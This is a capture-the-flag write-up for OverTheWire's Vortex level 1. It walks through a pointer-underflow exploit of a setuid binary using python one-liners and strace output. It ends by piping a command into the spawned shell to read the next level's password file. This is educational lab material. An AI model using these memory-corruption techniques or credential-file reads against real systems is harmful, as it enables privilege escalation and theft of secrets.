OverTheWire.org - Vortex - Level 1 Writeup

We have the code available, so it's a bit easier.

Basically we have a 512 byte buffer buf and a pointer ptr.

The memory, display from top to down is:

|---------|
|  ptr    | --
|---------|  |
| buf     |  |
|         |  |
|         |  |
|         |<--

ptr is initially pointing in the middle of buf.
If we put a \ in the input we decrease the buffer.
If we put a character that is not a "new line" it is written to the location pointed by ptr.
But also a shell is executed when ptr location is
By using gdb we know that ptr contains an address like 0xffffd4yy (in my case it was 0xffffd434)

We can use 261 \ to point ptr just one byte ahead of itself.
The overwrite it with a 0xca and a few valid bytes that resembles the original address.

vortex1@vortex:~$ python -c 'print "\\"*261 + "\xca\xfd\xff\xca"' | /vortex/vortex1
vortex1@vortex:~$

But it does nothing... or not?
Let's use strace and see...

vortex1@vortex:~$ python -c 'print "\\"*261 + "\xca\xfd\xff\xca"' | strace /vortex/vortex1
fstat64(0, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xfffffffff7fd6000
read(0, "\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\"..., 4096) = 267
geteuid32()                             = 5001
geteuid32()                             = 5001
geteuid32()                             = 5001
setresuid32(5001, 5001, 5001)           = 0
execve("/bin/sh", ["sh"], [/* 34 vars */]) = 0
[ Process PID=800 runs in 64 bit mode. ]
brk(0)                                  = 0x555555774000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=27393, ...}) = 0
mmap(NULL, 27393, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ffff7ff0000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P \2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1857312, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fef000
mmap(NULL, 3965632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ffff7a11000
mprotect(0x7ffff7bcf000, 2097152, PROT_NONE) = 0
mmap(0x7ffff7dcf000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1be000) = 0x7ffff7dcf000
mmap(0x7ffff7dd5000, 17088, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ffff7dd5000
close(3)                                = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ffff7fed000
arch_prctl(ARCH_SET_FS, 0x7ffff7fed740) = 0
mprotect(0x7ffff7dcf000, 16384, PROT_READ) = 0
mprotect(0x55555576f000, 8192, PROT_READ) = 0
mprotect(0x7ffff7ffc000, 4096, PROT_READ) = 0
munmap(0x7ffff7ff0000, 27393)           = 0
getpid()                                = 800
rt_sigaction(SIGCHLD, {0x555555566460, ~[RTMIN RT_1], SA_RESTORER, 0x7ffff7a47cb0}, NULL, 8) = 0
geteuid()                               = 5001
brk(0)                                  = 0x555555774000
brk(0x555555795000)                     = 0x555555795000
getppid()                               = 796
stat("/tmp/v1", {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 0
stat(".", {st_mode=S_IFDIR|0775, st_size=4096, ...}) = 0
ioctl(0, SNDCTL_TMR_TIMEBASE or SNDRV_TIMER_IOCTL_NEXT_DEVICE or TCGETS, 0x7fffffffe310) = -1 ENOTTY (Inappropriate ioctl for device)
rt_sigaction(SIGINT, NULL, {SIG_DFL, [], 0}, 8) = 0
rt_sigaction(SIGINT, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7ffff7a47cb0}, NULL, 8) = 0
rt_sigaction(SIGQUIT, NULL, {SIG_DFL, [], 0}, 8) = 0
rt_sigaction(SIGQUIT, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7ffff7a47cb0}, NULL, 8) = 0
rt_sigaction(SIGTERM, NULL, {SIG_DFL, [], 0}, 8) = 0
rt_sigaction(SIGTERM, {SIG_DFL, ~[RTMIN RT_1], SA_RESTORER, 0x7ffff7a47cb0}, NULL, 8) = 0
read(0, "", 8192)                       = 0
exit_group(0)                           = ?
+++ exited with 0 +++

Well it executes the bash in interactive mode, but it has an issue with ioctl() call.
Usually it can by bypassed by having the shell open and output the password file...

We can pass something to vortex1 process that will pass to bash interactive, like this;

vortex1@vortex:~$ (python -c 'print "\\"*261 + "\xca\xfd\xff\xca"'; echo "cat /etc/vortex_pass/vortex2") | /vortex/vortex1
2*******E
vortex1@vortex:~$